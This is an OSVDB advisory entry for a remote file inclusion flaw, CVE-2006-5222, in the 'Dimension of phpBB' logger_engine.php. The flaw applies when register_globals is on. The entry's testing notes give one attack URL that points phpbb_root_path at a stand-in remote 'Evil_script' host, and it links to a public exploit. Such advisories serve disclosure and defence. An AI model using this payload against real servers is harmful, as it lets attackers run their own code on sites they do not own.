Dimension of phpBB logger_engine.php phpbb_root_path Variable Remote File Inclusion

2006-10-05T07:49:38
ID OSVDB:29532
Type osvdb
Reporter OSVDB
Modified 2006-10-05T07:49:38

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Manual Testing Notes

http://[target]/[path]/includes/logger_engine.php?phpbb_root_path=http://[Evil_script]

References:

Secunia Advisory ID: 22287
Related OSVDB ID: 29531
ISS X-Force ID: 29361
Generic Exploit URL: http://milw0rm.com/exploits/2481
FrSIRT Advisory: ADV-2006-3923
CVE-2006-5222
Bugtraq ID: 20367